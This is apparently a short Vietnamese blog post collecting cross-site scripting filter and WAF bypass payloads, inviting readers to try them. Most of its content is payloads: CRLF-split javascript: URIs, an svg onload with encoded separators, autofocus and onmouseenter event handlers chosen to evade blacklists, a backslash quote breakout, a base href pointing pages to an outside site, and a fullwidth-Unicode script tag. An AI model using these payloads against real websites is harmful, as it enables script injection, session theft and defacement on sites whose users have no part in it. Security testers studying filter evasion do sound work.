Một số cách bypass XSS filter

Sau đây là một số cách bypass XSS filter dị dị sưu tầm được, anh em có thể trải nghiệm

Crlf injection to bypass javascript: Đang bị bờ lách lít

java%0d%0ascript%0d%0a:alert(0)

Trong trường hợp svg onload= bị filter, %0d sẽ đóng vai trò dấu ngăn cách và thỉnh thoảng cũng phá được waf :v.) %0a %0c %09 %00 cũng hay được sử dụng lắm nhé

<svg%0donload=prompt(1)>

Cách này bt không có gì :v

<input onfocus=alert(0) autofocus>

The use of \\ will break out of the quote inside a script tag

\\"-alert(0);//

The WAF blacklisted alert(0), prompt(0), but failed to filter confirm(1) aswell as onmouseenter=. Onmouseneter does the same as onmouseover= but a lot of devs seem to not know this (not sure why) and fail to blacklist it.

"onmouseenter=confirm(1)>

HTML Injection?

<base href=//yoursite.com>

Méo hiểu nổi

%uff1cscript%uff1ealert(1)%uff1c/script%uff1

Published by Nhat Truong

Hi

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: